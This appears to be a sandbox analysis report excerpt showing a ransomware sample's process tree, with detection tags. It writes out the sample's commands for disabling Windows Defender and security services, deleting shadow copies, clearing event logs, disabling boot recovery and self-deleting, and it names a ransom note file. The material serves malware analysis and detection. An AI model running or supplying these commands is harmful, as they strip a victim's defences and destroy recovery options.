C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3624
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3792
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2196
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3872
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1868 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:648
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1160 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2800 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2212 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:736 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1820 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2228 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2336 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:4056 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3684
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:900 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1768
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3652 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1060
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1112 -
C:\Windows\SYSTEM32\notepad.exenotepad.exe C:\4a7Z_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2436 -
C:\Windows\SYSTEM32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe"2⤵PID:2684
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:60
Network
MITRE ATT&CK Enterprise v6
Downloads